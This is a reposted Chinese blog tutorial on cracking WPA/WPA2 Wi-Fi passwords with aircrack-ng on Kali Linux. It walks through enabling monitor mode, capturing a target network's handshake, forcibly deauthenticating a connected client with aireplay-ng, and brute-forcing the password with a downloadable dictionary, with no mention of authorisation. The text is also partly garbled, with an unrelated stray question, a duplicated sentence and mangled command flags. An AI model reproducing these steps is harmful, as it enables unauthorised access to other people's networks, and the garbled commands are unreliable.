前言
最近整理了一些奇安信&华为&相信大佬的课件资料 大厂面试题目,想要的可以私信自取,免费赠送给粉丝朋友~
Aircrack-ng是一02.11标准无线网络分析相关的安全软件,主要功能有:网络检测、数据包嗅探、WEP和WPA/WPA2-PSK破解。Aircrack-ng可在任何支持监控模式的无线网卡上工作(请参阅其官方网站),嗅探802.11a,802.11b,802.11g的数据。Aircrack-ng可在任何支持监控模式的无线网卡上工作(请参阅其官方网站),嗅探802.11a,802.11b,802.11g这个程序可以在数据中运行Linux和Windows上。Linux版本已移植Zaurus和Maemo系统平台, 概念验证可移植iPhone。
使用Kali 2021.演示操作软件:aircrack-ng(Kali内置系统)外置无线网卡设备: 支持监听,支持Linux而且免驱(我在这里用的是RT3070)
进入Kali系统之后插入自己的网卡右键查看网卡是否连接到Kali
命令: sudo su解释: 如果不在管理员模式下运行,可能会有权限不足的提示
提示:执行命令后输入Kali的密码,密码是隐藏的,直接输入然后回车即可
命令: iwconfig/ifconfig
解释: iwconfig查看网卡信息,ifconfig检查新连接的设备wlan0是我们的无线网卡
命令: airmon-ng check kill
解释: 杀死过程可以使搜索更准确,不会受到影响
命令: airmon-ng
如果你的网卡信息出现,你的网卡支持监控
命令: airmon-ng start wlan0
解释: start打开哪个接口 wlan0是界面的名称
再用iwconfig查看网卡信息,wlan0后面多了个mon,wlan0mon这意味着监控已经打开。
命令: airodump-ng wlan0mon
解释: BSSID:WIFI的MAC地址、PWR:信号强度(值越小,信号强度越强)Data:监控期间流量总合,CH:信道、ENC:加密算法、ESSID:WIFI名称
提示:找到网络后CTRL Z结束搜索
命令: airodump-ng -c (频道号) --bssid (MAC地址) -w (数据包的保存位置) wlan0mon
解释:
1.c:信道
2.bssid:BSSID值
3.w:捕获的握手包应保存在路径上
我要破解的目标网络是Test,CH(信道)为11,MAC地址是E2:D4:64:02:73:A8,我在根目录下创建了一个名为1的文件夹输入命令: airodump-ng -c 11 --bssid E2:D4:64:02:73:A8 -w 1/ wlan0mon
移动空调的原理是什么?
提示:所有值应写下刚刚发现要破解的值WIFI其中一个客户端值
当新客户端连接时,客户端可以通过输入密码连接抓握手包,右上角出现WPA他说他抓住了对方的握手包
命令: aireplay-ng -o 2 -a BSSID(MAC地址) -c STATION wlan0mon
解释:
0 :攻击客户端,断开连接设备
二、表示攻击次数,0表示一直在攻击
a :指定无线路由器BSSID
c :指定强制断开的设备MAC
执行命令aireplay-ng -o 2 -a E2:D4:64:02:73:A8 -c C8:94:02:6D:93:F3 wlan0mon
抓住握手包时,停止攻击
注:执行主动攻击时,新建终端执行命令,不要结束原来的抓包终端
命令: aircrack-ng -a2 -b E2:D4:64:02:73:A8 -w 字典.txt 1/-01.cap
解释:
a2:WPA的握手包
b :破解的WIFI的BSSID
w :指定字典文件
* :.cap抓取握手包的数据包文件
最后是等跑字典,以下是破解WIFI20041101年密码
命令: airmon-ng stop wlan0mon
在监控模式下,kali无法连接网络
插入网卡,如果看不到网卡信息,点开连接WIFI看看你是否能搜索到附近的网络。如果没有,右键系统可移动设备-断开网卡并重新连接
插入网卡,打开网卡的监听模式,搜索附近的WIFI,拿到握手包,最后跑字典破解握手包,这里有一个常用的密码字典
链接:
https://pan.baidu.com/s/1NSNniAvaLdcY0HALbBnUTw?pwd=gg7y提取码: gg7y
版权声明:本文为CSDN博主「HonkerG」的原创文章
原文链接:
https://blog.csdn.net/RFZ_322/article/details/123344248
郑重声明:本文版权归原作者所有,转载文章仅为传播更多信息之目的,如作者信息标记有误,请第一时候联系我们修改或删除,多谢。
标签:
评论